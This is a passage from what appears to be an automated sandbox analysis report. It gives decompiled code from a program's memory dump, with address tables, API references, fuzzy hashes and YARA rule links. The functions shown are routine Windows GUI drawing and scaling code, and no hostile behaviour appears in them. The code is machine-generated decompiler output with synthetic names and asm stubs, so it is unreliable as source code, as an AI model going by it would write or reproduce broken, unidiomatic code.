											L16:
											_t260 =  *((intOrPtr*)( *_t240 + 0x208));
											E0041FCC0( *((intOrPtr*)( *_t240 + 0x208)));
											__eflags = _v17 & 0x00000001;
											if(__eflags == 0) {
												L20:
												E0041F338( *((intOrPtr*)(_t260 + 0x14)), _t242, _a8, _t257, _t265, __eflags);
												L21:
												E0041F9D0(_t260,  &_v49);
												L22:
												 *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 0xd4))(_v17,  &_v49);
												_t180 =  *_t240;
												__eflags =  *((char*)(_t180 + 0x28c));
												if( *((char*)(_t180 + 0x28c)) != 0) {
													__eflags = _v17 & 0x00000004;
													if((_v17 & 0x00000004) != 0) {
														_t201 =  *_t240;
														__eflags =  *((char*)(_t201 + 0x1a5));
														if( *((char*)(_t201 + 0x1a5)) != 0) {
															_t202 = _a24;
															_t253 = _a24;
															__eflags =  *(_t202 - 0x84) |  *(_t253 - 0x88);
															if(( *(_t202 - 0x84) |  *(_t253 - 0x88)) != 0) {
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsd");
																_t257 = _t257;
																_t205 = _a24;
																__eflags =  *(_t205 - 0x84) & 0x00000004;
																if(( *(_t205 - 0x84) & 0x00000004) != 0) {
																	_t206 = _a24;
																	__eflags =  *(_t206 - 0x84) & 0x00000008;
																	if(( *(_t206 - 0x84) & 0x00000008) == 0) {
																		_t88 =  &(_v65.bottom);
																		 *_t88 = _v65.bottom +  *((intOrPtr*)(_a24 - 0x40));
																		__eflags =  *_t88;
																	}
																} else {
																	_v65.right = _v65.right +  *((intOrPtr*)(_a24 - 0x70));
																}
																DrawEdge(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x84));
																DrawEdge(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x88));
															}
														}
													}
												}
												_t181 =  *_t240;
												__eflags =  *((char*)(_t181 + 0x28c));
												if( *((char*)(_t181 + 0x28c)) != 0) {
													_t182 =  *_t240;
													__eflags =  *(_t182 + 0x1c) & 0x00000010;
													if(( *(_t182 + 0x1c) & 0x00000010) == 0) {
														__eflags = _v17 & 0x00000002;
														if((_v17 & 0x00000002) != 0) {
															_t183 =  *_t240;
															_t252 =  *0x45c12c; // 0x2400
															__eflags = _t252 - ( *(_t183 + 0x248) &  *0x45c12c);
															if(_t252 != ( *(_t183 + 0x248) &  *0x45c12c)) {
																__eflags =  *( *_t240 + 0x249) & 0x00000010;
																if(__eflags == 0) {
																	_t188 = E004037B0( *_t240, __eflags);
																	__eflags = _t188;
																	if(_t188 != 0) {
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		_t257 = _t257;
																		_v33.left = _v49.right;
																		_v33.right = _v49.left;
																		DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v33);
																	} else {
																		DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
																	}
																}
															}
														}
													}
												}
												goto L39;
											}
											__eflags = _v17 & 0x00000002;
											if(__eflags == 0) {
												L19:
												E0041F338( *((intOrPtr*)(_t260 + 0x14)), _t242, 0x8000000d, _t257, _t265, __eflags);
												E0041EB4C( *((intOrPtr*)(_t260 + 0xc)), 0x8000000e);
												goto L21;
											}
											_t256 =  *0x45c128; // 0x0
											__eflags = _t256 - ( *( *_t240 + 0x248) &  *0x45c124);
											if(__eflags == 0) {
												goto L20;
											}
											goto L19;
										}
										_t232 =  *_t240;
										__eflags =  *(_t232 + 0x1c) & 0x00000010;
										if(( *(_t232 + 0x1c) & 0x00000010) == 0) {
											goto L22;
										}
										goto L16;
									}
									_t233 =  *_t240;
									__eflags =  *(_t233 + 0x249) & 0x00000004;
									if(( *(_t233 + 0x249) & 0x00000004) == 0) {
										goto L14;
									}
									_t234 =  *_t240;
									__eflags =  *((char*)(_t234 + 0x28d));
									if( *((char*)(_t234 + 0x28d)) == 0) {
										goto L14;
									}
									_t235 =  *_t240;
									__eflags =  *(_t235 + 0x1c) & 0x00000010;
									if(( *(_t235 + 0x1c) & 0x00000010) == 0) {
										goto L39;
									}
									goto L14;
								}
							}
							break;
						}
						_v49.top =  *((intOrPtr*)(_a24 - 0x40)) + _v49.bottom;
						_t130 =  &_v16;
						 *_t130 = _v16 + 1;
						__eflags =  *_t130;
						continue;
					}
					break;
				}
				return _t138;
			}






































                                                                                0x0045be01
                                                                                0x0045be04
                                                                                0x0045be0a
                                                                                0x0045be0d
                                                                                0x0045be13
                                                                                0x0045c101
                                                                                0x0045c101
                                                                                0x0045c107
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045c10b
                                                                                0x0045c114
                                                                                0x0045be1b
                                                                                0x0045be21
                                                                                0x0045be31
                                                                                0x0045c0dc
                                                                                0x0045c0df
                                                                                0x0045c0e2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045c0e4
                                                                                0x0045c0e6
                                                                                0x0045c0ec
                                                                                0x0045be45
                                                                                0x0045be4b
                                                                                0x0045be4e
                                                                                0x0045c0cf
                                                                                0x0045c0d8
                                                                                0x0045c0db
                                                                                0x0045c0db
                                                                                0x00000000
                                                                                0x0045c0db
                                                                                0x0045be6b
                                                                                0x0045be6d
                                                                                0x00000000
                                                                                0x0045be73
                                                                                0x0045be76
                                                                                0x0045be7b
                                                                                0x0045be80
                                                                                0x0045be82
                                                                                0x0045be84
                                                                                0x0045be8c
                                                                                0x0045be8f
                                                                                0x0045be91
                                                                                0x0045be93
                                                                                0x0045be99
                                                                                0x0045be9b
                                                                                0x0045be9b
                                                                                0x0045be9b
                                                                                0x0045be9b
                                                                                0x0045be99
                                                                                0x0045be8f
                                                                                0x0045bea2
                                                                                0x0045beaa
                                                                                0x0045beaf
                                                                                0x0045beb1
                                                                                0x0045beb3
                                                                                0x0045beb3
                                                                                0x0045beb3
                                                                                0x0045beb3
                                                                                0x0045beb7
                                                                                0x0045bebb
                                                                                0x0045bedf
                                                                                0x0045bedf
                                                                                0x0045bee1
                                                                                0x0045bee8
                                                                                0x0045bef2
                                                                                0x0045bef4
                                                                                0x0045bf01
                                                                                0x0045bf06
                                                                                0x0045bf0a
                                                                                0x0045bf4a
                                                                                0x0045bf50
                                                                                0x0045bf55
                                                                                0x0045bf5a
                                                                                0x0045bf5f
                                                                                0x0045bf70
                                                                                0x0045bf76
                                                                                0x0045bf78
                                                                                0x0045bf7f
                                                                                0x0045bf85
                                                                                0x0045bf89
                                                                                0x0045bf8f
                                                                                0x0045bf91
                                                                                0x0045bf98
                                                                                0x0045bf9e
                                                                                0x0045bfa7
                                                                                0x0045bfaa
                                                                                0x0045bfb0
                                                                                0x0045bfb9
                                                                                0x0045bfba
                                                                                0x0045bfbb
                                                                                0x0045bfbc
                                                                                0x0045bfbd
                                                                                0x0045bfbe
                                                                                0x0045bfc1
                                                                                0x0045bfc8
                                                                                0x0045bfd5
                                                                                0x0045bfd8
                                                                                0x0045bfdf
                                                                                0x0045bfe7
                                                                                0x0045bfe7
                                                                                0x0045bfe7
                                                                                0x0045bfe7
                                                                                0x0045bfca
                                                                                0x0045bfd0
                                                                                0x0045bfd0
                                                                                0x0045c008
                                                                                0x0045c02b
                                                                                0x0045c02b
                                                                                0x0045bfb0
                                                                                0x0045bf98
                                                                                0x0045bf89
                                                                                0x0045c030
                                                                                0x0045c032
                                                                                0x0045c039
                                                                                0x0045c03f
                                                                                0x0045c041
                                                                                0x0045c045
                                                                                0x0045c04b
                                                                                0x0045c04f
                                                                                0x0045c051
                                                                                0x0045c061
                                                                                0x0045c068
                                                                                0x0045c06b
                                                                                0x0045c06f
                                                                                0x0045c076
                                                                                0x0045c07e
                                                                                0x0045c083
                                                                                0x0045c085
                                                                                0x0045c0a7
                                                                                0x0045c0a8
                                                                                0x0045c0a9
                                                                                0x0045c0aa
                                                                                0x0045c0ab
                                                                                0x0045c0af
                                                                                0x0045c0b5
                                                                                0x0045c0ca
                                                                                0x0045c087
                                                                                0x0045c099
                                                                                0x0045c099
                                                                                0x0045c085
                                                                                0x0045c076
                                                                                0x0045c06b
                                                                                0x0045c04f
                                                                                0x0045c045
                                                                                0x00000000
                                                                                0x0045c039
                                                                                0x0045bf0c
                                                                                0x0045bf10
                                                                                0x0045bf2e
                                                                                0x0045bf36
                                                                                0x0045bf43
                                                                                0x00000000
                                                                                0x0045bf43
                                                                                0x0045bf22
                                                                                0x0045bf29
                                                                                0x0045bf2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bf2c
                                                                                0x0045beea
                                                                                0x0045beec
                                                                                0x0045bef0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bef0
                                                                                0x0045bebd
                                                                                0x0045bebf
                                                                                0x0045bec6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bec8
                                                                                0x0045beca
                                                                                0x0045bed1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bed3
                                                                                0x0045bed5
                                                                                0x0045bed9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045bed9
                                                                                0x0045be6d
                                                                                0x00000000
                                                                                0x0045c0ec
                                                                                0x0045c0fb
                                                                                0x0045c0fe
                                                                                0x0045c0fe
                                                                                0x0045c0fe
                                                                                0x00000000
                                                                                0x0045c0fe
                                                                                0x00000000
                                                                                0x0045c114
                                                                                0x0045c120

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cece8a76ed6c42ea098dfc4e10f05c1ef134cf81c6061f06068430d5f36978dc
                                                                                • Instruction ID: 837a3775693fb1747dfe6eea28fc7c014706e51f64b2177a40ed002ee77a759f
                                                                                • Opcode Fuzzy Hash: cece8a76ed6c42ea098dfc4e10f05c1ef134cf81c6061f06068430d5f36978dc
                                                                                • Instruction Fuzzy Hash: 2AB11B75A006189FDB10DF58C485BEEB7F5EF09305F1440A6ED44AB3A2C778AC4ACB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0044E634, Relevance: 7.7, APIs: 5, Instructions: 171COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			E0044E634(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t202 = _t203;
				_v8 = __eax;
				E00438704(_v8);
				_push(_t203);
				_push(0x44e88a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x487709; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E00437E74(_v8, 0, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E004350BC(_v8, _t98, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E00435100(_v8, _t100, _t214);
					}
					_t180 =  *0x44e898; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E0044DB9C(_v8, 1, 1);
						E0043B818(_v8, 1, 1, _t215);
					}
					E00436848(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x44e891);
					return E0043870C(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x487c00; // 0x22e0f1c
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x487c00; // 0x22e0f1c
							E0041ED34( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041ED2C( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x487c00; // 0x22e0f1c
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E0044E9BC(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E0044DB9C(_v8, _t122, _t199);
						E0043B818(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

















                                                                                0x0044e634
                                                                                0x0044e635
                                                                                0x0044e63c
                                                                                0x0044e642
                                                                                0x0044e649
                                                                                0x0044e64a
                                                                                0x0044e64f
                                                                                0x0044e652
                                                                                0x0044e65a
                                                                                0x0044e665
                                                                                0x0044e670
                                                                                0x0044e676
                                                                                0x0044e678
                                                                                0x0044e682
                                                                                0x0044e68d
                                                                                0x0044e69c
                                                                                0x0044e7fe
                                                                                0x0044e801
                                                                                0x0044e807
                                                                                0x0044e809
                                                                                0x0044e810
                                                                                0x0044e810
                                                                                0x0044e818
                                                                                0x0044e81e
                                                                                0x0044e820
                                                                                0x0044e827
                                                                                0x0044e827
                                                                                0x0044e82f
                                                                                0x0044e835
                                                                                0x0044e83b
                                                                                0x0044e83d
                                                                                0x0044e84c
                                                                                0x0044e85e
                                                                                0x0044e85e
                                                                                0x0044e86f
                                                                                0x0044e876
                                                                                0x0044e879
                                                                                0x0044e87c
                                                                                0x0044e889
                                                                                0x0044e6b2
                                                                                0x0044e6bc
                                                                                0x0044e6c7
                                                                                0x0044e6d0
                                                                                0x0044e6dc
                                                                                0x0044e6fc
                                                                                0x0044e6fc
                                                                                0x0044e6d0
                                                                                0x0044e701
                                                                                0x0044e70c
                                                                                0x0044e71a
                                                                                0x0044e71f
                                                                                0x0044e725
                                                                                0x0044e727
                                                                                0x0044e72d
                                                                                0x0044e736
                                                                                0x0044e749
                                                                                0x0044e758
                                                                                0x0044e777
                                                                                0x0044e777
                                                                                0x0044e787
                                                                                0x0044e7a6
                                                                                0x0044e7a6
                                                                                0x0044e7b6
                                                                                0x0044e7d5
                                                                                0x0044e7f8
                                                                                0x0044e7f8
                                                                                0x0044e7b6
                                                                                0x00000000
                                                                                0x0044e727

                                                                                APIs
                                                                                • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044E6F3
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E76F
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E79E
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E7CD
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E7F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 179e502b649ba4b6491df2e8353e2539bc661f28efba15cfb078de0c6466ef6c
                                                                                • Instruction ID: 4bc58ff00013c07b577bdc672f5bb2155b15ba06c25ac9d37719f0d5c6b72ce6
                                                                                • Opcode Fuzzy Hash: 179e502b649ba4b6491df2e8353e2539bc661f28efba15cfb078de0c6466ef6c
                                                                                • Instruction Fuzzy Hash: 8371C474A04104EFDB04EBA9C589AADB7F5BF49304F2541F9E808EB362C739AE41DB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004459FC, Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E004459FC(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x445be0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E00447860(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E00448E9C(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E004043B8( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E0040471C(_v16, 0x445c04);
					if(_t153 != 0) {
						E0041F454( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E0041EE0C( *((intOrPtr*)(_v8 + 0xc))) |  *0x445c08;
							E0041EE18( *((intOrPtr*)(_v8 + 0xc)), E0041EE0C( *((intOrPtr*)(_v8 + 0xc))) |  *0x445c08, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E004045D8(_v16);
							_t65 = E004047D0(_v16);
							DrawTextA(E0041FDC4(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x445be7);
							return E00404320( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E0041EB4C( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
								_t89 = E004045D8(_v16);
								_t91 = E004047D0(_v16);
								DrawTextA(E0041FDC4(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E0041EB4C( *((intOrPtr*)(_v8 + 0xc)), 0x80000010);
							} else {
								_t76 = E0041E68C(0x8000000d);
								_t78 = E0041E68C(0x80000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E0041EB4C( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E0041FDC4(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E004045E0( &_v16, 0x445bf8);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















                                                                                0x004459fc
                                                                                0x004459fd
                                                                                0x00445a07
                                                                                0x00445a0a
                                                                                0x00445a0d
                                                                                0x00445a10
                                                                                0x00445a12
                                                                                0x00445a17
                                                                                0x00445a18
                                                                                0x00445a1d
                                                                                0x00445a20
                                                                                0x00445a25
                                                                                0x00445a2a
                                                                                0x00445a2e
                                                                                0x00445a3e
                                                                                0x00445a4d
                                                                                0x00445a50
                                                                                0x00445a55
                                                                                0x00445a55
                                                                                0x00445a55
                                                                                0x00445a40
                                                                                0x00445a43
                                                                                0x00445a43
                                                                                0x00445a58
                                                                                0x00445a58
                                                                                0x00445a64
                                                                                0x00445a6c
                                                                                0x00445a92
                                                                                0x00445a9a
                                                                                0x00445a9f
                                                                                0x00445add
                                                                                0x00445ae2
                                                                                0x00445ae6
                                                                                0x00445aeb
                                                                                0x00445af7
                                                                                0x00445aff
                                                                                0x00445aff
                                                                                0x00445b04
                                                                                0x00445b08
                                                                                0x00445ba5
                                                                                0x00445bad
                                                                                0x00445bb6
                                                                                0x00445bc5
                                                                                0x00445bca
                                                                                0x00445bcc
                                                                                0x00445bcf
                                                                                0x00445bd2
                                                                                0x00445bdf
                                                                                0x00445b0e
                                                                                0x00445b0e
                                                                                0x00445b12
                                                                                0x00445b1c
                                                                                0x00445b2c
                                                                                0x00445b39
                                                                                0x00445b42
                                                                                0x00445b51
                                                                                0x00445b5e
                                                                                0x00445b5e
                                                                                0x00445b63
                                                                                0x00445b67
                                                                                0x00445b95
                                                                                0x00445ba0
                                                                                0x00445b69
                                                                                0x00445b6e
                                                                                0x00445b7a
                                                                                0x00445b7f
                                                                                0x00445b81
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00445b8e
                                                                                0x00445b8e
                                                                                0x00000000
                                                                                0x00445b67
                                                                                0x00445b08
                                                                                0x00445aa4
                                                                                0x00445ab2
                                                                                0x00445ab3
                                                                                0x00445ab4
                                                                                0x00445ab5
                                                                                0x00445ab6
                                                                                0x00445acb
                                                                                0x00445acb
                                                                                0x00000000
                                                                                0x00445a6e
                                                                                0x00445a72
                                                                                0x00445a85
                                                                                0x00445a8d
                                                                                0x00000000
                                                                                0x00445a8d
                                                                                0x00445a7a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00445a7f
                                                                                0x00445a83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00445a83

                                                                                APIs
                                                                                • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00445ACB
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 00445B1C
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445B51
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 00445B5E
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445BC5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Draw$OffsetRectText$Edge
                                                                                • String ID:
                                                                                • API String ID: 3610532707-0
                                                                                • Opcode ID: 433828e7e3ec566315ab3be7533957cae28c9e632e97fc2d6305ba227f22d50c
                                                                                • Instruction ID: 68969ed9cb05b664d4419c1763d0a6a8e74d1c20bfe0b3deb612a047e544336f
                                                                                • Opcode Fuzzy Hash: 433828e7e3ec566315ab3be7533957cae28c9e632e97fc2d6305ba227f22d50c
                                                                                • Instruction Fuzzy Hash: F7516174A04648AFEF10EBA9C881B9EB7E5EF45314F24856BF910E7392C73CAD418719
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042A6C8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E0042A6C8(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
				char _v8;
				int _t40;
				CHAR* _t42;
				int _t54;
				CHAR* _t56;
				int _t65;
				CHAR* _t67;
				intOrPtr* _t76;
				intOrPtr _t86;
				struct tagRECT* _t91;
				signed int _t93;
				int _t94;
				intOrPtr _t97;
				signed int _t104;

				_push(0);
				_t93 = __ecx;
				_t91 = __edx;
				_t76 = __eax;
				_push(_t97);
				_push(0x42a81e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t97;
				 *((intOrPtr*)( *__eax + 0x90))();
				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
					E004045E0( &_v8, 0x42a834);
				}
				if( *((char*)(_t76 + 0x170)) == 0) {
					_t104 = _t93;
				}
				_t94 = E00437978(_t76, _t93, _t104);
				E0041FCC0( *((intOrPtr*)(_t76 + 0x160)));
				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
					_t40 = E004045D8(_v8);
					_t42 = E004047D0(_v8);
					DrawTextA(E0041FDC4( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
				} else {
					OffsetRect(_t91, 1, 1);
					E0041EB4C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000014);
					_t54 = E004045D8(_v8);
					_t56 = E004047D0(_v8);
					DrawTextA(E0041FDC4( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
					OffsetRect(_t91, 0xffffffff, 0xffffffff);
					E0041EB4C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000010);
					_t65 = E004045D8(_v8);
					_t67 = E004047D0(_v8);
					DrawTextA(E0041FDC4( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
				}
				_pop(_t86);
				 *[fs:eax] = _t86;
				_push(0x42a825);
				return E00404320( &_v8);
			}

















                                                                                0x0042a6cb
                                                                                0x0042a6d0
                                                                                0x0042a6d2
                                                                                0x0042a6d4
                                                                                0x0042a6d8
                                                                                0x0042a6d9
                                                                                0x0042a6de
                                                                                0x0042a6e1
                                                                                0x0042a6eb
                                                                                0x0042a6f7
                                                                                0x0042a721
                                                                                0x0042a721
                                                                                0x0042a72d
                                                                                0x0042a72f
                                                                                0x0042a72f
                                                                                0x0042a73e
                                                                                0x0042a749
                                                                                0x0042a757
                                                                                0x0042a7e8
                                                                                0x0042a7f1
                                                                                0x0042a803
                                                                                0x0042a75d
                                                                                0x0042a762
                                                                                0x0042a775
                                                                                0x0042a77f
                                                                                0x0042a788
                                                                                0x0042a79a
                                                                                0x0042a7a4
                                                                                0x0042a7b7
                                                                                0x0042a7c1
                                                                                0x0042a7ca
                                                                                0x0042a7dc
                                                                                0x0042a7dc
                                                                                0x0042a80a
                                                                                0x0042a80d
                                                                                0x0042a810
                                                                                0x0042a81d

                                                                                APIs
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 0042A762
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A79A
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 0042A7A4
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A7DC
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A803
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
